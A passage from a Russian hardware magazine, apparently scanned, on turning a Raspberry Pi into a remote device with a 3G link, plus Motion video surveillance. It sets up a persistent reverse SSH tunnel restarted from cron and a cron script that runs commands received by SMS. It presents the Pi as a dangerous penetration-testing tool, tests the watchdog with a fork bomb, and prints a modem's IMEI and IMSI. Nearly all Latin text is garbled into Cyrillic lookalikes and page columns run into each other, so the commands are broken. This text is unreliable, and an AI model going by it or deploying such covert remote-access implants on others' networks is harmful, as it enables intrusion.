квнешнему питанию, 
которым может быть порт 
0ЗВ или электросеть. 


ИИ? ИИИИИИИИНИВЬ ``” 
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Доустановим поддержку РРР 


# арф-веф 1п$$а11 ррр 


Попробуем установить соединение в интерактивном режи- 
ме, указывая необходимые данные. 


# ./зак1$3в --1пегас&1уе 


Выберем первую опцию, «Соппес мий ЗС», в ответ на сле- 
дующий запрос выберем «11. Си от АРМ...». Укажем (данные 
для Мегафон-Москва): 


АРМ: 1пфегпее 
АРМ Ц5ЕК: теда+оп 
АРМ_РАЗ5: тераРоп 


Если соединение было установлено успешно, выйдем 
из меню и проверим доступ к интернету: 


# р1ид 2оо21е. сот 


Следующая программа, УМТЗКеерег (700133.ип!-ага7.а/ 
ре!7/ипзкеерег), необходима для автоматического подключе- 
ния при разрыве связи. Загрузим, разархивируем и разрешим 
выполнение: 


# шКа1г ->/38 && са 35 
# мреф НЕ р://700133.ип1-вгах.а{/рее7/ите$Кеерег/‹> 
5гс/ите$Кеерег.Фаг. 57 


# Таг -хиу+ ит$Кеерег.Фаг. 57 
# ситоа +х чт 5Кеерег 


Проверим ЧУМТЗКеерег, подставив свои значения в параме- 
тры ЧУЗВМОВЕМ (\Мепаог О:Бемсе ЮО, который виден при вводе 
команды 1|5и$6) и СУЗТОМ_АРМ, АРМ_УЗЕВА, АРМ_РА$$, $М_ 
РИМ (данные для подключения к ЗО-сети): 


# ./чте$Кеерег --заК1зорегафогз "У$ВТМТЕКЕАСЕ='@' += 
ОТНЕК= ' У5ВМОБЕМ' Ц$ВМОБЕМ=' 12а1:1003' АРМ=е- 
'СУЗТОМ_АРМ" СУ$ТОМ_АРМ= '1пегпеф" $ТМ_РТМ=е» 
'1234' АРМ_У$ЕВ='тедафоп" АРМ_РА$$='тера+оп'" «= 
--5акК1$5м1ЕсИе$ "--зи4до --соп$01е" --аем1сепате += 


'Ниаме1' --10= --$11епЕ --паЕ ‘по 


Проконтролируем работы, открыв журнал в другом окне: 


# а11 /уаг/1о2/итЕ$Кеерег.1о0= -+ 

2013-04-01 10:37:38 ${аге: 1пегуа1=4*8$ 
ТиегиеЕ $факиз: 

Модет р1иёвеа, поф соппесфе фо 1пфегпеф. 
2013-04-01 10:38:27 ТпфегпеЕ соппес®1оп 1$ ОБОММ. 
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Са111п5 $аК1$36 соппесе... 

5ак1536 ста11пе: п1се ./заК1$3в соппесЕ --$и940 += 
--с0п$01е ИУЗВТМТЕВРАСЕ='@' ОТНЕВ=" У$ВМОБЕМ" ‹= 
У$ВМОБЕМ= ' 1241 :1003' АРМ=" СУ$ТОМ_АРМ" «= 
СУ$ТОМ_АРМ= '1птегпеф' $51М_РТ\№М='1234' АРМ У$ЕК=+= 
'перагоп" АРМ_РА$5= 'тедафоп' 

5ак1$536 зау®... 

Е1550 соппесфеЧ фо МераРоп (25002). 

2013-04-01 10:39:20 Тез{1пв соппес®1оп... 
2013-04-01 10:39:37 $иссе$$... ме аге оп11пе! 


Теперь отредактируем /ес/гс оса! для запуска при загрузке 
системы: 


# папо /ефс/гс.1оса1 

/гоот/3=/итЕ$Кеерег --заК1зорегафог$ <> 
"ОЗВТМТЕКРАСЕ='9" ОТНЕК=' У$ВМОБЕМ" У$ВМОБЕМ=«>- 
'1291:1003' АРМ=' СУ$ТОМ_АРМ" СУ$ТОМ_АРМ=+ = 
'1ифегпее' $1М_РТ№='1234' АРМ _УЗЕК="'терафоп' < 
АРМ_РА$$='тера+оп'" --заК1$5м1ЕсПез$ "--5и40 «= 
--соп$01е" --4еу1сепате 'Ниуамет" --1о8 --$11еп ++ 
--пае ‘по’ & 


Опции батти И проверим после перезагрузки. 


ВЕУЕВЗЕ$ЗН 

Для удаленного подключения к Р\мпР! через ЗС настроим подня- 

тие Веуегзе 5$Н туннеля (для этого нужен сервер с публичным Р). 
Чтобы Р\пР! подключался к серверу в автоматическом ре- 

жиме, без ввода пароля, на РмтРЕ сгенерируем приватный/пу- 

бличный ключи и скопируем публичный ключ на сервер: 


# 55П-Кеудеп 
# эср /гоо*/.55И/14А_гза.риб гоо{@‹адрес сервера»>: += 
/гоо*/ 


На сервере (если это Бефап) добавим публичный ключ 
в список авторизованных: 


саЕ -—/14 гза.риб >> -/.5$5$П/аиЕПог1теа Кеу$ 
Попробуем подключиться к серверу с Рмип РЕ: 


# $5П гоо@‹адрес сервера> 


Подключение должно произойти без запроса пароля. В слу- 
чае если пароль все равно запрашивается и подключение с ис- 
пользованием ключей настраивается в первый раз, необходи- 
мо задать права доступа к этому файлу (и папке в целом): 


ДОСТУП К МОДЕМУ С ПОМОЩЬЮ МИСОМ 


Для проверки работоспособности можно попробовать «достучаться» до него, как до обыч- 
ного модема, с помощью питсот: 


# арт-веф 1п$$а11 т1п1сот 
# т1п1сот -0 /аему/Еуу$ве 


Запросим информацию о производителе модема с помощью АТ-команды 


а+10 

МапиРас®игег: Пиаме1 

Моде1: Е1550 

Веу1$1оп: 11.608.12.10.209 
ТМЕТ: < ТМЕТ вашего модема › 
+@САР: ›+С6$М, +05, -+Е$ 


[0] 


Выйдем нажатием <Си+А+0>. 
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# сбтоа 755 > 


# сптоа 700 -/.551 
# сИтоа 600 -/.55И/аи{Ног1хед_Кеу$ 


Теперь установим туннель с перенаправлением портов. 
Со стороны Р\/пРЕ: 


# 55Й -а -М№ -К 1221: 10са110$*:22 += 
гоо*@‹адрес сервера» 


Со стороны сервера теперь порт 1221 ждет подключений, 
но только на интерфейсе 127.0.0.1: 


# пефзфае -ап |2гер 1221 


персов ИН я-а -СОвЕБТАЕМ 


Со стороны сервера проверим подключение через Веуегзе 
55Н, подключившись к локальному порту: 


# 5з5П гоо@1оса1По${ -р 1221 


Если все правильно, после ввода пароля пользователя гоо{ 
системы Р\мпР! мы должны получить доступ к Р\/п РЕ. Со стороны 
сервера разрешим перенаправления портов для всех интер- 
фейсов: 


# папо /ефс/$$И/5$5Па_сопЯ? 
баемауРогЕ$ уе$ 


Теперь необходимо, чтобы $5Па перечитал конфигурацион- 
ный файл. Посмотрим, какой у него РИО: 


# р$ аих|егер $$5Па 


2о9г 235492024 
0:00 /чзг/$61п/$5Па 


ВОЗ ЬЗ 6255 13:09 


И пошлем ему сигнал НУР: 


# К111 -Пир 23511 
# а11 /уаг/1о=/5$$Па.102. 


Теперь после установления соединения с РмпР! увидим, 
что процесс ожидает подключение на всех интерфейсах: 


# пефзфае -ап -р |2гер 1221 
249,222): од. 92 к 47): © 
ЕТЗТЕМ 21990/ э5Па: гоот 


Создадим сценарий для автоматического запуска и дадим 
ему права на выполнение: 


# папо /гоот/гемеге_$$5П_Фиппе1 . $И 

#1 /Б1п/5$И 

И5ЕВНО$Т=гоо{@‹адрес сервера> 

КРОКТ=22 #Порт55Н сервера 

ЕРОКТ=1221 # Порт, который будет открыт насервере 


[А 192.168.1.20 - РЫТГУ 


= = 
= == 
= 3 
—— 
= - 


| 2 192.168.1.20 - РИТГУ 


Интерфейс $ак!$3@ 


Приветствие башав 
РмтР! 


Мы Шн ы 1 
НН ин Ш 
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Р1еазе зетесс ап ассфог. 


Уош сап апсошасе сН3з зетесьзоп Бу зесбфпа МЕМО такфаБ1е оп сошшапа 14пе. 


Сноозе ассфоп Еог Зак1з36 зсЕёре со Ео11ом. 


2. Моге. оретоп= вва 
3. АБоые бах1=36 
3. ЕжаС. 


СОММ=1оса]В0$*:22  #Порт55Н Иепегна РмпР! 
СОММАМО="$5пй -а -М -К ФЕРОВТ:$СОММ ФУЗЕКНОЗТ «= 
-р $ФВРОКТ" 
регер -+ -х "$СОММАМО" > /дем/пи11 2>81 || «- 
$СОММАМО 
эй ФОЗЕКНО$Т - ВРОКТ пеф$фае -ап | «= 
еггер "Еср.*:ФЕРОКТ. *1Т$ТЕМ" >/А4е\м/пи11 2>&1 
1+ [ $? -пе 0 ] ; ЕПеп 

еспо "ВКезфаг{1п> соппесЕ1оп" 

рк111 -Е -х "$СОММАМО" 


$СОММАМО 
е]1 зе 
еспо "'Соппесф1оп ОК' 


в 7 
# спто +х геуегп5е_$5П_фиппе1 .5И 


Добавим строку с указанием запускать каждую минуту 
в сготар: 


# сгопфаЬ -е 
*/1 * * * * /Б1п/5п /гоот/гемегзе_$5И_Фиппе1.5И 


АВТОМАТИЧЕСКОЕ СОХРАНЕНИЕ 
ДАННЫХВЕУ\УЕВМОТЕ 

Есть много вариантов для автоматической передачи и хранения 
данных, от традиционной почты до популярных облачных сер- 
висов, от бооче Оиуе до Еуетсае. Отправить данные в Еуетае 
можно с помощью утилиты беекпсе (\м/л/м/.деекпоте. те): 


# мреЕ ПЕЁр: / /ммм. вееКпо{е .те/ 91$ /- 
_ реекпоте_Тафез*.аеб 

# зиао арК5 -1 врееКпо%фе_1афез*.аеБ 

# вееКпофе 1051п 


Укажем свои данные для входа в Еуетоте (необходимо сде- 
лать только один раз, если пользователь не изменяется). Соз- 
дадим новую записную книжку и добавим тестовую запись: 


# сееКпофе пофебоок-сгеафе --+1{1е "РмпР1 Чажа" 
# геекпофе сгеафе --пофебоок "РипР1" += 
--{1Е]е "Тез" --сопфепе "Тез поте" 


Сеектпоф{е поддерживает автоматическую синхронизацию 
текстовых файлов в указанном каталоге с помощью входящей 
в пакет утилиты дп5упс. Для синхронизации ее необходимо за- 
пустить со следующими ключами (синхронизируется каталог 
/гоо®): 


# спзупс --раей /гооф --тазК *.105 + 
--пофебоок "РипР1" 


УПРАВЛЕНИЕЧЕРЕЗ $ М$ 
К сожалению, работа ЗС унас не отличается стабильностью. Так 
что в качестве дополнения можно реализовать передачу команд 
(например, перезагрузки) и уведомлений с помощью $М$ с ис- 
пользованием пакета Сатти. 
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# аре-геф 1п$Фа11 ватти 
# ватти-сопй5 


В меню установим порт /Аем/Нуц$В1 (для З@ был настроен 
/аем/Нуч$ВО). Запросим описание устройства: 


# датти --1епЕ1+у 
Устройство : /4еу/ЕуЧ$В1 


МапиРасфигег : Ниаме1 

Модель : Е1550 (Е!550) 
Е1гтмаге : 11.608.12.10.209 
ТМЕТ : 351911043904005 


Номер $ТМ (ТМ5Т) : 250026700613366 


Можно включить режим мониторинга и попробуем отпра- 
вить тестовое сообщение: 


# ватти --топ1ок 
# еспо "+ез{ +гот РипР1" | ватти зепд$т$ < 
ТЕХТ +7‹номер телефона» 


Для русского языка (юникодная локаль в Р\мпР! по умолча- 
нию не выставлена) можно использовать ключ -итсоае. 


ПРИЕМ $М$ 
Для получения 5М$ необходимо установить 


# арф-веф 1п$фа11 ватти-$т$а 


И указать тот же порт 3С-модема в конфигурации: 


# папо /ефс/датти-$т$Агс 
[затти] рог*=/ае\м/%у1$В1 


Запустим как сервис и посмотрим журнал: 


# ватти-$зт$ --4аетоп 
# 1а11 -+ /уаг/105/5у$10в 


Входящие сообщения сохраняются в папку: 


# са /уаг/5роо1/=атти/1пБох && 15$ 
1№20130402_ 193338_00_+7‹номер телефона>_00.&хЕ 


Внутри содержится полученный текст $М$. Создадим сцена- 
рий для выполнения команд из $М$. В примере ниже, при по- 
лучении текста 'ирите' отправителю высылается сообщение с 
результатом выполнения команды ирйте: 


$ папо зтхспеск 
#1! /б1п/Ба$в 
Фог Я1е 1п `1$ /маг/5роо1 /ватти/1пБох` 
до 
ста=`са{ /уаг/зроо1/=атти/1пбох/$Я1е` 
сазе "$ста" 1п 
"“ире1те“”) 
еспо `ирф1те` > /умаг/5роо1 /ватти/оиБох/ «= 
ОЧТ+7‹номер телефона>.Ех* 


езас 
ги -Р /уаг/5роо1 /ватти/1пБох/$Я1е 
допе 


# сито +х зтзсйеск 


Поскольку в папке /уаг/зроо/датти/тбох уже должны 
лежать наши тестовые сообщения, запустим этот сценарий 
и убедимся, что он отправляет нужное сообщение. Добавим его 
в сгощаб с периодичностью выполнения одна минута с помо- 
щью следующей записи: 


# сгопфаб -е 
*/1 * * * + /Иоме/р1/зтзсйеск 


Перегружаем систему и проверяем работоспособность на- 
шей конфигурации. 


КТО СЛЕДИТ ЗА СЛЕДЯЩИМ 


В современных микроконтроллерах может применяться ряд средств, повы- 
шающих надежность работы встраиваемых устройств в необслуживаемом 
режиме. Один из механизмов, предназначенных для этого, — аппаратный 
миайспаод-таймер, позволяющий перезагрузить устройство в случае его 
зависания. Программа, работоспособность которой должна быть прокон- 
тролирована, периодически должна сбрасывать этот таймер. Если она пре- 
кратит это делать, таймер превысит пороговое значение, и на на процессор 
будет подан сигнал сброса. В Мпих программное обеспечение поддержки 
миайспаод состоит из двух частей: драйвера маёспаод-таймера и маспПадод- 
демонов, контролирующих работоспособность системы в целом. 


ММАТСНООС-ДРАЙВЕР 
Загрузка модуля драйвера: 


# зиао тоаргобе Бст2708_м9о5 
Добавление в список автозагружаемых модулей: 


# есйпо "бст2708 мао=" | зидо %ее -а /ефс/тоди1е$ 


\Мазспаод-таймер стартует при открытии устройства. Сброс его осущест- 
вляется отправкой любого символа. Символ \/ отключает таймер. Убедиться 
в работоспособности можно так: 


# саЕ > /аеу/мае спадов 


Теперь от перезагрузки систему отделяет только ввод строк с клавиатуры 
(команда са{ передает набираемый текст построчно). Ввод символа \ с по- 
следующим <Етщег> остановит обратный отсчет. 


\ММАТСНООС-ДЕМОН 

Пакет ммасПао9д состоит из двух демонов: упрощенного — м/А_кеерайуе и ос- 
новного — ма{спаод, предоставляющего более широкие возможности. С его 
помощью можно контролировать не только загрузку системы, но и такие 
параметры, как объем доступной памяти, доступ к отдельным файлам, до- 
ступность узлов по команде рта и ряд других. 


# аре-сеф 1п5фа11] мафсНдо= # Установка 
# ирдафе-гс.4 мафсИдоР ае+аи1%5 # Добавление в автозагрузку 


Для настройки в файле /@с/маспаод.сопГ необходимо раскомментиро- 
вать несколько строк: 


# папо /ефс/мафсПдов. соп+ 
мафсп9о5-аем1се = /4еу/масП9дов 
тах-1]оаа-1 = 24 


Запуск в ручном режиме 


# /ефс/1п1*.А/маЕсИаов $Жаг® 


ПРОВЕРКА 
Наиболее простой способ проверить работоспособность настройки 
миайспаод — ввести в командной строке так называемую ТогК Бот: 


50 ::& 3: 


Система очень быстро перестанет откликаться и, если все настроено 
правильно, через несколько секунд уйдет в перезагрузку. 


ИТОГ 


При своей кажущейся несерьезности Вазрбегту Р! может стать опасным инстру- 
ментом, хотя высокое энергопотребление ограничивает возможность работы в 
автономном режиме. Впрочем, ближайшие по функционалу аналоги на сегодняш- 
ний день, коммерческие инструменты репагаНоп-тестирования компании Р\ММЕ 
Ехрге5$, находятся в совершенно другой ценовой категории. == 


СОУЕПЗТОВУ 


г. 


У 


Александр Лыкошин 
а!укозпт@дтай.сот, 
Нопе.ги 


ати 
ый" == 


эн" Е” 


= 


Внимательный Р! 


СОЗДАЕМ СИСТЕМУ ВИДЕОНАБЛЮДЕНИЯ 
НА БАЗЕ ВАЗРВЕВНУ Р! 


Наиболее популярный пакет, используе- $ \412-сЕ1 --115&-РогтаЕ$-ехе 
мый для видеонаблюдения на РазрЬе!гту 
Р', — Мойоп. Мы уже рассказывали о нем 


Проверить камеру можно, попробовав сделать скриншот с камеры: 


$ зидо арЕ-вее 1п$5%а11 чуссар®иге 


в статье «Кофе с малиной», но в контексте $ иуссарфиге -58@ -в8@ -С80 -680 -х800 -уб@0 
детектирования движения. Посмотрим УСТАНОВКА МОТОМ 

на предоставляемые им возможности ви- Устанавливаем Моноп и разрешаем запуск в качестве сервиса: 
деонаблюдения внимательнее на примере ЕВС 

камеры одцесй НО \ММебсат С525. Исполь- $ 5440 папо_/ес/Чефаи1/то1оп 

зовать будем стандартный Вазрап. # зеф фо ’уез’ $0 епаб1е Пе то1оп даетоп 


5фагЕ то{1оп_Чаетоп=уе$ 


Конфигурационный файл /&с/тойоп/тойоп.соп{ на первый взгляд ка- 
жется большим и содержит практически все настройки Мойоп, но хорошо от- 
комментирован внутри и описан на сайте Мойоп (\млллм..1амгзеп.аК/ЛозмикИвп/ 


Перед началом установки обновим список пакетов: мем//МопопД№МерНоте). Пройдемся по ключевым параметрам. 
$ зидо арЕ-вее ирда*е $ зиао папо /еЕс/то1оп/то1оп. сой 
ПОЛУЧЕНИЕИНФОРМАЦИИОКАМЕРЕ . По умолчанию доступ к веб-интерфейсу доступен только с локальной 
Информация об устройстве УЗВ: машины. Откроем его для внешних узлов: мебсат юосапоз$оН; 
сощго! юосатоЗ ой. 
$ 15155 Формат видеопотока должен соответствовать поддерживаемому ка- 
Виз 001 Беуз1се 007: ТО 046а:0826 1овлфесй, Тис. мерой. Его можно посмотреть в выводе \412-с{ --1$1{-РЮогтат: 0 — $910, 
1 — ВАВ1, 2 — МУРЕС, 3 — УРЕС, 4 — ВОВЗ, 5 — ЦУМ 6 —МЛ\ 7 — 422Р 
Получение информации о поддерживаемых форматах: 8 — \У12. К сожалению, формат МУРЕС камеры не распознается МоНоп, 
поэтому указываем некомпрессированный формат: \4!2_рае(е 6. 
$ зидо арЕ-веф 1п$%а11 \41-иЕ115$ . Размеры кадра: итафИ 320, ПелейЕ 2490. 
$ \412-сЕ1 --1иРо . Максимальное количество кадров, захватываемых 
в секунду: Егатегате 5. 
Полный список поддерживаемых форматов в зависимости от разреше- . Запись отдельных изображений даже при отсутствии 


ния можно получить с помощью следующей команды: движения: оч{ри*_ а11 о++. 
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[РИ ЦИ ла фол 


Количество кадров, сохраняемых в видеофайл до момента 
детектирования движения и по его завершении: рге_сар- 
фиге 9, ро${ сар\иге 9. 

Задержка по времени от завершения детектирования движе- 
ния до срабатывания соответствующего события: вар 69. 
Изображения с камеры сохраняются в каталоге, задава- 
емом параметром: фагве{_@41г /&тр/то1оп.Формат 
отдельных изображений по умолчанию РС. 

Управление сохранением файлов изображений при де- 
тектировании движения осуществляется параметром: 


25 


100.0 График загрузки про- чен режим зтайтазк, он отображается красными областями. 
цессора при запуске При включении режима юсае область, в которой обнаружено 
МоНоп движение, выделяется прямоугольником. Кроме задания клю- 


ча ‘-$' в командной строке, режим настройки можно включить 
в конфигурационном файле либо включив соответствующий 
параметр в веб-интерфейсе. 

В среднем режиме разгона процессора (Медит 900 МН? 
АВМ, 250 МНЕ соге, 450 МН2 ЗОВАМ, 2 омегуоК), разрешении 
320 х 240 и записи видео максимум 5 кадров в секунду загрузка 
процессора (ориентировочно): 

отстутствие движения: 5—7%; 

изменение значительной части изображения: 40—56%. 


При том же разрешении и записи видео в режиме 10 кадров 
в секунду (ориентировочно): 

отсутствие движения: 15-25%; 

изменение значительной части изображения: 50—80% 


оцриЕ погта1 оп. По умолчанию сохранение включено. РУО Просмотр в браузере добавляет еще примерно 10% за- 
Можно выключить (ой) либо указать, какие кадры сохранять грузки. Сходные значения наблюдались и при разрешении 
при детектировании движения. Текст статьи 640 х 480 и записи видео максимум 10 кадров в секунду. 
Включение-выключение сохранения видеороликов при де- «Кофе смалиной» А вот увеличение количества кадров в секунду заметно ухуд- 


тектировании движения (при необходимости): Е+трезй_ 

сар пем оп. 

Формат видеороликов по умолчанию — З\МЕ. 

Другие поддерживаемые форматы видео: # МРЕС-1 (.трд), 
МРЕС-4/МЗМРЕС-4 (.ам), ЭММ/Е, РЕМ, ЕРУЛ, 

МО\: ЕЁтреё_\1Ч9ео_со4ес $м+. 

Разрешение сохранения периодических снимков с камеры 
(интервал в секундах): зпар$По*_1пфегуа1 09. 
Управление отрисовкой квадрата вокруг области, в которой 
детектировано движение: 1осафе о++. 


ЗАПУСК 
Запуск из командной строки осуществляется с ключом 


$ зиао тоЕ1оп -п 


доступен на диске. 


шает ситуацию с загрузкой процессора, и потому его лучше 
избегать. Вероятно, 5 кадров в секунду — наиболее предпо- 
чтительный режим работы. При работе в автономном режиме 
карта памяти будет достаточно быстро переполняться, поэто- 
му можно рекомендовать создать выделенный раздел для со- 
хранения видеороликов.Также следует отметить, что Мойоп 
может использоваться для замедленной (покадровой) съем- 
ки — Нте!арзе. 


СОХРАНЕНИЕВИДЕОРОЛИКОВ 

ВСООСТЕОНММУЕ 

Необходимо установить РУпоп и Рр (средство для установки па- 
кетов РУПоп) и библиотеку адата для поддержки бооде Ва АР!: 


$ зи4о ар*-вее 1п$%а11 руЕНоп руЕПоп-р1р 


МИТИ7 $ зиао р1р 1п$%а11 эдафа 
Ключ '-п’ указывает на запуск в консольном режиме с вы- 
водом отладочной информации. Если теперь помахать рукой Дополнительно реко- Скопируем необходимые файлы на машину: 
перед камерой, начнется запись: мендации по настройке 
детектирования движе- $ мвеЕ "НЕрз: //4ос$.воО21е.сот/ис?149=9Вм\ек$+Е8И ть 
[1] 2Е11е о+ %уре 8 зауеа Фо: ния можно прочитать на 791рт7/В$0Еа\И8&ехрог*=Чаомп1оаа" -О ир1оааег.ру 


/Хтр/то{1оп/01-20130403180739.а\1 
[1] 2Е11е о+ %уре 1 зауеа Фо: 
/Хтр/то{1оп/01-20130403180739-00.3р= 
[1] 2Е11е о+ фуре 1 зауеа Фо: 
/&тр/то{1оп/01-20130403180740-00.}р= 
[1] 7Е11е о+ %уре 1 зауеа Фо: 


/Етр/то{10п/01-20130403180741-00.]р5 


Настройки Мойоп доступны не только в конфигурационном 
файле, но и через веб: ПЕр://<газрбеггур!>:8080/. С помощью 
простого веб-интерфейса можно изменить переменные кон- 
фигурационного файла, записать текущую конфигурацию, вы- 
полнить другие несложные действия, как, например, включить 
запись или узнать статус детектирования движения. 

Изображение с камеры можно просмотреть в браузере 
п р://<газрбеггур!>:8081 или в медиапроигрывателе \ЁС, от- 
крыв этот же ЦВЕ. К сожалению, обновление изображения про- 
исходит с низкой периодичностью — для Мойоп просмотр вре- 
альном времени скорее дополнительная опция, чем основной 
режим работы. 

Для настройки детектирования движения существует спе- 
циальный режим настройки. Для этого нужно запустить то#оп 
С КЛЮЧОМ '-5'. 


$ зиао тоЕТоп -$ 


В этом режиме при просмотре потока с камеры в браузере 
будет отображаться черная картинка с цифрами: количество из- 
менившихся пикселей, количество помеченных областей (1абе! 
агеа) и уровень шума. При движении будут показаны пиксели 
в черном и белом цветах. Самая крупная помеченная область 
(если включен этот режим) отмечена синим цветом. Если вклю- 


сайте ммм [амгзеп.К/ 
ТоЗмикИп/лем/Моноп/ 
ТиппоМовоп. 


$ мвеЕ "ИЕрз: //4ос$ .воо21е. сот/ис?19=9Вм\мек$+8 ть = 
7№07М№) УСМЭУПУМЕЕ&ехрог*=ао\т1оаЧ" -О ир1оадег. с+5. 


Сделаем ирюоааег.ру исполняемым 


$ сптоа +х ирТоааег.ру 


В сценарии ирюоааег.ру в качестве интерпретатора указан 
руУопд, и, чтобы не вносить в сценарий изменения, создадим 
ссылку рУПоп2 на интерпретатор РУПоп: 


$ 11 /чзг/61п/руЕВоп /ч5г/61п/руЕВоп2 


Отредактируем файл ирюадег.сТо, указав имя пользователя 


БЕСПРОВОДНЫЕ МИНИ-КЛАВИАТУРЫ 
С0 ВСТРОЕННЫМ ТАЧПАДОМ 


Беспроводная мини-клавиатура РА\/! ЕЕОЛ-Аи-ВЕ со встроенным тачпадом 
(у меня она называлась АТ-ММ/КО1) пользуется заслуженной популярностью 
у пользователей НРазрбегтгу Р!. 

Она прекрасно подходит под формат Разрбетту, будучи лишь чуть длиннее 
(15х5,8х 1,3 см, при весе всего 454 г), и годится не только для управления меди- 
ацентром, но и для более сложных задач, хотя большие тексты, конечно же, сее 
помощью набирать тяжело. 
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СоодЕе и его пароль, адреса отправителя и получателя: 


$ папо ир1оа4ег. с+2 

[2та11] 

# СМа11 ассоип* сгедепе1а1$ 

паме = Мо{1оп Ур]оадег 

и5ег = <имя пользователя СМа11> 
ра$$мог = <пароль> 

зепаег = ‹адрес отправителя> 
гес1р1еп{ = ‹адрес для уведомлений» 


В браузере откроем Сооде Опуе и создадим папку /тойоп. 
Теперь протестируем на любом файле из директории Атр/ 
тойоп: 


$ ./ир1оааег.ру ./ир1Тоааег. св «= 
/Хтр/то1оп/01-20130401214735.5м+ 


и изменим конфигурацию Мойоп: 


$ зи4о папо /еёс/то1оп/тоетоп. соп+ 
оп_то\1е_епа /поме/р1/ир]1оааег.ру «= 
/поте/р1/ир1оадег. с + 


ЗАПИСЬ ЗВУКА 

К сожалению, МоНоп может работать только с изображением. 
Для записи звука потребуется задействовать другую програм- 
му, агесога, взяв за основу инструкцию \^/\л/\м..|1а\мгзеп. ЧК ЛозмикиИ 
бшллем/МоНоп/5оцпаАнаюВесогатод. 


Для начала посмотрим описание устройства: 


$ агесога -1 
**** [1$ о+ САРТОВЕ Нагдмаге Ое\у1сез **** 
сага 1: С525 [НО Мебсат С525], аем1се 0: 
(1$В Ацато [4$5В Ачат1о] 

5ибаеу1се$: 1/1 

<ибаеутсе #0: зибаеу1се #9 


$ агесога -Ё 
пи11 
015саг а11] затр1ез (р]ауБаск) 
ог гепегафе хего затр1ез (сарфиге) 
сузаеРаи1{ :САВО=С525 
НО мМебсат С525, 1$В Ацато 
Ое+аи1{ Ача1о Беу1се 
гоп : САКБ=С525 , ОЕ\/=@ 
НО мМебсат С525, Ц$5В Ацато 
Егоп{ зреаКег$ 
зиггоцпа 49 : САКО=С525 ‚ ЭЕ\/=@ 
НО мебсат С525, Ц5В Аиато 
4.0 $иггоипа оцЕриЕ фо Егоп{ апа 
Веаг зреаКег$ 


Указать это устройство можно как «Им:1,0» (номер карты 
и номер устройства) либо как «зузаетаиН:СААО=С525». Созда- 
дим папку для сохранения файлов и попробуем записать звук 
скамеры: 


$ шка1г /потме/р1/агесога/ 
$ симоЧ 777 /Ноте/р1/агесога/ 
$ агесога -0 Вм:1,0 -+ $16 1Е %е5%*.мау -г 16000 -\у 


Прослушав полученный файл и убедившись, что запись ра- 
ботает, установим ГАМЕ для компрессии в МР3 и проверим за- 
пись с сжатием на лету: 


$ 5и40 ар*-веЕ 1п$фа11 1ате 


$ агесог -О Им:1,0 -+ $16 _1Е -г 16000 | Лате «= 
-5 16000 -п -Ь 256 - тез*.тр3 


В другом терминальном окне запустим фор и увидим, 
что ГАМЕ потребляет около 30% процессора, что в сочетании 
с загрузкой от самого МоНоп при 10 кадрах в секунду, дости- 
гающей около 70% во время детектирования движения, может 


Тестовая картинка 
МоНоп 
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приблизить систему к нестабильному режиму. Если все получи- 
лось, скорректируем конфигурацию Моноп: 


$ зи4о папо /е&с/то&1оп/тотоп . соп 
оп_емеп*_5фагЕ агесога -9 №м:1,0 -Р $16 Е -г += 
16000 | 1ате -з 16000 -И -Ь 256 +. 

- /поте/р1/агесога/%_%У-йт-%а_#%М-%5.тр3З 
оп_еуеп*_еп4` рк111 -9 -Е "^]1ате -$ 16000 -п -Ь += 
256 - /Поте/р1/агесога/"; рк111 -9 -+ "^агесога += 
-О Им:1,@ -+ $16 1Е -г 16000 | Ламе -$ 16000 -П «. 
-6 256 - /Поте/р1/агесога/" 


ро$Е_сарфиге 25 
бар 1 


Запустим МоНоп от пользователя тойоп и снова посмо- 
трим загрузку процессора без движения и во время детек- 
тирования движения, обратив внимание на процессы тойоп 
и |ате. Сам по себе |1ате требует в среднем 24—34% процес- 
сорного времени. 


$ ъиао -и моЕ1оп тоТоп -п 


В таком режиме лучше записывать не более 5 кадров в секунду. 


ИТОГ 

С учетом существования недорогих веб-камер, с встроен- 
ными портами Епете и \\М-Н, ИК-подсветкой и автома- 
тической выгрузкой видеороликов по сети, приобретение 
ВазрЬеггу Р!г только для видеонаблюдения вряд ли целесоо- 
бразно. Однако если параллельно с этим необходимо реше- 
ние еще нескольких задач, таких как подача сигналов на ис- 
полнительные устройства, нестандартная логика и многое 
другое, мало что сможет сравниться с ней по соотношению 
цена — функциональность. Опять-таки, сложно переоценить 
то, как полезно иметь на таком устройстве доступ к полно- 
ценной операционной системе с богатым выбором дополни- 
тельных пакетов. = 


АДАПТЕРЫ \-Н 


Хорошим дополнением к ВазрЬегту Р! могут стать беспроводные УЗВ-адаптеры 
\М-Е!в формате папо, такие как, например, адаптер Еайтах Е\//- 7811 Ип (мне он 
достался под названием ЭЦесот_ М/ЛА-1001). 


СОУЕНЗТОВУ 
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НЕПОБЕДИМ 
АНМАДА 


НИШЕВЫЕ ДРУЗЬЯ 
ВАЗРВЕННВУ Р1 


=7 


На диске еще 
лежит наша статья 
из августовского 
номера, в которой 
разных АЕМ-железок 
еще больше 


ДОМАШНИЙ КИНОТЕАТР: 
$ОЦОВОМ СОВОХ 

АР! достаточно рано вызвал 
интерес у разработчиков ме- 
диацентра ХВМС, и на то есть 
две причины. Во-первых, под- 
держка 1080р и аппаратного 
декодирования популярных 
кодеков (кроме, увы, ОТ$). Во- 
вторых, поддержка стандарта НОМГСЕС — благодаря ему ме- 
диацентром можно управлять с помощью пульта почти любо- 
го телевизора. Но это не меняет того факта, что у ВР! слабый 
процессор и ЧЗВ-контроллер, из-за которого вся периферия 
постоянно борется между собой за доступ к шине. В арсенале 
СиВох есть и поддержка 1080р, и СЕС, но также у израиль- 
ской машинки есть один гигабайт памяти и поддержка еЗАТА. 


А это, согласись, в корне меняет дело. 


МАЗ/ВЕБ-СЕРВЕР: 


СЕМЕЙСТВО РОСОРЦИС 

(У$В-контроллер мешает РазрБеггу РГ и тут. Кро- 
ме того, для надежной работы жестких дисков, 
скорее всего, понадобится подключать их через 
Ц5В-хаб с собственным питанием. Поэтому лучше 
взять платформу, которая специально разраба- 
тывалась для создания небольших МАЗ’ов и веб- 
серверов. Семейство Родора — это устройства 
от нескольких вендоров, построенные на чипсете 
Магмие! Кикмоо4 и использующие прошивку и веб- 


сервис Родора для зеркалирования содержимого дисков в облако. Проще всего в России 
взять зеадае РЕгееАдет{ СоРех Ноте/МеТ (модели для 3,5- и 2,5-дюймовых дисков, соот- 
ветственно). Прошивка легко сносится и меняется на АгспИпих АНМ, а диски подключаются 
через еАТА. Кстати, необязательно покупать фирменные диски — подойдут и любые дру- 
гие, хотя плотно стоять они не будут. 


ОУ: МАЛЕНЬКИЕ РОУТЕРЫ ТР-ЦШМК 
